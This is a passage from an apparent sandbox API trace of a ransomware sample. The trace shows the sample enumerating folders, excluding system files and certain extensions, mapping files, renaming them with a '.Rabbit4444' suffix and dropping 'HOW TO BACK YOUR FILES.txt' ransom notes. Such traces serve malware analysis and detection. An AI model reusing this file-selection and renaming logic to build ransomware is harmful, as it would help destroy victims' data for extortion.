ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.621] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.621] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.621] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.621] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.621] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.621] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3692e47, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3692e47, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3692e47, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.621] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.621] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.621] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9de3c89, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea046217, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea12b043, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x890, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="76c2f954cb8d4b4399c1ffc4efc3a907_1", cAlternateFileName="76C2F9~1")) returned 1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2="Rabbit4444.exe") returned -1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2=".") returned 1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2="..") returned 1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2="windows") returned -1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2="bootmgr") returned -1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2="pagefile.sys") returned -1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2="boot") returned -1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2="ids.txt") returned -1 [0070.621] lstrcmpiW (lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1", lpString2="NTUSER.DAT") returned -1 [0070.621] lstrcpyW (in: lpString1=0x130ec48, lpString2="76c2f954cb8d4b4399c1ffc4efc3a907_1" | out: lpString1="76c2f954cb8d4b4399c1ffc4efc3a907_1") returned="76c2f954cb8d4b4399c1ffc4efc3a907_1" [0070.621] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\76c2f954cb8d4b4399c1ffc4efc3a907_1", dwFileAttributes=0x0) returned 1 [0070.622] lstrlenW (lpString="76c2f954cb8d4b4399c1ffc4efc3a907_1") returned 34 [0070.622] lstrlenW (lpString="Rabbit4444") returned 10 [0070.622] lstrcmpiW (lpString1="efc3a907_1", lpString2="Rabbit4444") returned -1 [0070.622] lstrlenW (lpString=".dll") returned 4 [0070.622] lstrcmpiW (lpString1="07_1", lpString2=".dll") returned 1 [0070.622] lstrlenW (lpString=".lnk") returned 4 [0070.622] lstrcmpiW (lpString1="07_1", lpString2=".lnk") returned 1 [0070.622] lstrlenW (lpString=".ini") returned 4 [0070.622] lstrcmpiW (lpString1="07_1", lpString2=".ini") returned 1 [0070.622] lstrlenW (lpString=".sys") returned 4 [0070.622] lstrcmpiW (lpString1="07_1", lpString2=".sys") returned 1 [0070.622] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\76c2f954cb8d4b4399c1ffc4efc3a907_1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\targetedcontentcache\\v3\\280813\\76c2f954cb8d4b4399c1ffc4efc3a907_1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.623] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.623] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16193334640) returned 1 [0070.623] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2192) returned 1 [0070.623] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0070.623] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0070.623] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb90, lpName=0x0) returned 0x2d0 [0070.624] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb90) returned 0x70000 [0070.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115180 [0070.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0070.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0070.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0070.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0070.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0070.625] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16193567159) returned 1 [0070.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0070.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0070.625] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.625] CloseHandle (hObject=0x2d0) returned 1 [0070.625] CloseHandle (hObject=0x29c) returned 1 [0070.625] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\76c2f954cb8d4b4399c1ffc4efc3a907_1.Rabbit4444") returned 181 [0070.625] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\76c2f954cb8d4b4399c1ffc4efc3a907_1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\targetedcontentcache\\v3\\280813\\76c2f954cb8d4b4399c1ffc4efc3a907_1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\76c2f954cb8d4b4399c1ffc4efc3a907_1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\targetedcontentcache\\v3\\280813\\76c2f954cb8d4b4399c1ffc4efc3a907_1.rabbit4444"), dwFlags=0x1) returned 1 [0070.626] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9de3c89, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea046217, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea12b043, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x890, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="76c2f954cb8d4b4399c1ffc4efc3a907_1", cAlternateFileName="76C2F9~1")) returned 0 [0070.626] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0070.626] lstrcpyW (in: lpString1=0x130ec48, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.626] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\TargetedContentCache\\v3\\280813\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\targetedcontentcache\\v3\\280813\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.627] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.627] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.627] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.627] CloseHandle (hObject=0x29c) returned 1 [0070.627] CloseHandle (hObject=0x27c) returned 1 [0070.627] GetCurrentThreadId () returned 0xd98 [0070.627] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0070.627] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets" [0070.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11f578 | out: hHeap=0xe0000) returned 1 [0070.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0070.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets" [0070.627] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\" [0070.627] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\.BFC0E91B00AE8A0620D3" [0070.627] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\stagedassets\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.631] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.633] FlushFileBuffers (hFile=0x27c) returned 1 [0070.634] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.634] CloseHandle (hObject=0x27c) returned 1 [0070.635] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets") returned 117 [0070.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.635] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6112409, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7edfd5ce, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf36b90d3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0070.635] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.635] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.635] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.635] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.635] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6112409, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7edfd5ce, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf36b90d3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.635] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.635] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.635] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.635] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.635] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.635] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf36b90d3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf36b90d3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf36b90d3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.635] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.636] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.636] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0e3f831, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb381bf2f, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb3cba331, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0xa6aeb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", cAlternateFileName="DBD5A1~1")) returned 1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2="Rabbit4444.exe") returned -1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2=".") returned 1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2="..") returned 1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2="windows") returned -1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2="bootmgr") returned 1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2="pagefile.sys") returned -1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2="boot") returned 1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2="ids.txt") returned -1 [0070.636] lstrcmpiW (lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", lpString2="NTUSER.DAT") returned -1 [0070.636] lstrcpyW (in: lpString1=0x130ec24, lpString2="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338" | out: lpString1="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338") returned="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338" [0070.636] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", dwFileAttributes=0x0) returned 1 [0070.637] lstrlenW (lpString="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338") returned 64 [0070.637] lstrlenW (lpString="Rabbit4444") returned 10 [0070.637] lstrcmpiW (lpString1="f0de827338", lpString2="Rabbit4444") returned -1 [0070.637] lstrlenW (lpString=".dll") returned 4 [0070.637] lstrcmpiW (lpString1="7338", lpString2=".dll") returned 1 [0070.637] lstrlenW (lpString=".lnk") returned 4 [0070.637] lstrcmpiW (lpString1="7338", lpString2=".lnk") returned 1 [0070.638] lstrlenW (lpString=".ini") returned 4 [0070.638] lstrcmpiW (lpString1="7338", lpString2=".ini") returned 1 [0070.638] lstrlenW (lpString=".sys") returned 4 [0070.638] lstrcmpiW (lpString1="7338", lpString2=".sys") returned 1 [0070.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\stagedassets\\dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.638] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.638] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16194880032) returned 1 [0070.638] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=682731) returned 1 [0070.638] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0070.638] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0070.638] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa6df0, lpName=0x0) returned 0x2d0 [0070.639] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa6df0) returned 0x2f10000 [0070.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115180 [0070.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0070.658] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0070.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0070.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0070.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0070.659] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16196943208) returned 1 [0070.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0070.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0070.659] UnmapViewOfFile (lpBaseAddress=0x2f10000) returned 1 [0070.665] CloseHandle (hObject=0x2d0) returned 1 [0070.665] CloseHandle (hObject=0x29c) returned 1 [0070.665] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338.Rabbit4444") returned 193 [0070.665] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\stagedassets\\dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\stagedassets\\dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338.rabbit4444"), dwFlags=0x1) returned 1 [0070.666] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0e3f831, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb381bf2f, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb3cba331, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0xa6aeb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dbd5a16e8ac2fb7349e67e0aaf70d60e2641485dd003bce430f036f0de827338", cAlternateFileName="DBD5A1~1")) returned 0 [0070.666] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0070.666] lstrcpyW (in: lpString1=0x130ec24, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.666] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\stagedassets\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.666] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.667] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.668] 